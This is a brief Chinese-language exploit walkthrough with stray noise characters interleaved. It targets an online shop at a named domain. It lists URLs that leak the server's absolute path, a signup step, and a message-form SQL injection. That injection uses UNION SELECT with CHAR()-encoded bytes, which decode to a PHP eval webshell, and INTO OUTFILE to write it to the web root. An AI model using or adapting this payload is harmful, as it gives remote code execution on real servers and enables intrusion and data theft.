第一个:想办法找到目标网站的绝对路径. q7 Q5 L+ O E1 Y
+ [& U! ?! s& g
http://www.political-security.com/install/svinfo.php?phpinfo=true% K) S2 g& T; y3 S7 j% U# m5 ?
9 U9 r) J1 h9 D
http:/www.political-security.com/core/api/shop_api.php
( O" a) [( z: H7 m5 {- E
2 [6 }7 e& U$ |9 `http://www.political-security.co ... api_b2b_2_0_cat.php
2 F* G' W" Q5 S1 B# O3 T" A0 K' ?% ?
http://www.political-security.com/core/ap ... b_2_0_goodstype.php. W+ {3 _' v) R4 ?1 a- G2 T
& ?( y& i5 _* p+ g4 Fhttp://www.political-security.co ... i_b2b_2_0_brand.php w7 B: x8 r+ V& O* E; U
第二个:注册一个普通用户' H% C. K- o; l9 \2 r
. n) E6 M4 o9 o: w( U/ t: k
http://www.political-security.com/?passport-signup.html5 w4 p8 |) o2 J' {8 N4 m6 [
% R& q8 m: h- X$ t) [# R) g第三个: 发送消息 , B& h( p. H7 N0 c5 m
- [6 Y7 r! j) i7 M) _: n
http://www.political-security.com/?member-send.html5 H' e6 E# j3 t1 _: o) ?
发送给中填写% W( T' C5 n5 r& o
antian365.com' union select CHAR(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 39, 35, 39, 93, 41, 59, 63, 62) into outfile 'E:/zkeysoft/www/x.php' # |